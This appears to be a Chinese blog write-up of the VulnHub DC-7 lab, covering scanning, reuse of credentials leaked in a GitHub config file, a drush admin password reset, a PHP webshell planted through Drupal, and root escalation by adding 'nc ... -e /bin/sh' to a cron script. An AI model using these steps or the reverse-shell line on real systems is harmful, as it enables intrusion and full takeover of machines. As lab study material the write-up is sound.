vulnhub靶机:dc-7

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

靶机IP

10.9.23.157

2:端口扫描

nmap -A -p- -T4 10.9.23.157

3:端口探测

给的提示去搜索一下

@DC7USER

发现是github的一些代码,下载进行查看

在config.php配置文件里发现了用户名和密码

$username = "dc7user";

$password = "MdR3xOgB7#dW";

尝试右上角的登录界面

登陆失败

二:渗透测试

1:ssh登录

尝试ssh登录

ssh dc7user@10.9.23.157

在产看文件发现存在一个定时任务

cd /opt/scripts/

2:漏洞利用

发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。

drush常用命令:

$ drush cr  各种清缓存

$ drush pm-enable 安装module

$ drush pm-uninstall 卸载module

$ drush pm-list  显示所有modules and themes列表

$ drush user-password admin --password "123" 更改密码

cd /var/www/html

drush user-password admin --password="root"

然后用更改后的密码登录到系统中:

使用以下命令创建新用户:

drush user-create root --password "root"

drush user-password root --password="root"

新创建的用户没有东西,还是去admin

dc7的CMS是Drupal8,已经移除了PHP Filter(php过滤器),后续作为一个模组存在,可以手动安装。在官网找到下载链接,下载之后给 DC-7 安装

http://drupal.org/project/php

在Content中添加一句话木马,依次点击:content(内容)→add content→basic page(为静态内容使用基本页面),测试添加,命名为ceshi。选择format为php code。

挂一句话木马()

使用蚁剑连接,反弹shell

三:提权

写入反弹shell、交互式shell然后提权,不过前面用drash命令时,发现是定时任务,可以再定时任务中添加用/bin/bash执行的nc命令,然后监听:

nc 10.9.23.112 6666 -e /bin/sh

定时任务需要等待一会

成功拿下

posted @ 2024-03-14 11:50  woaishuaidan  阅读(116)  评论(0)    收藏  举报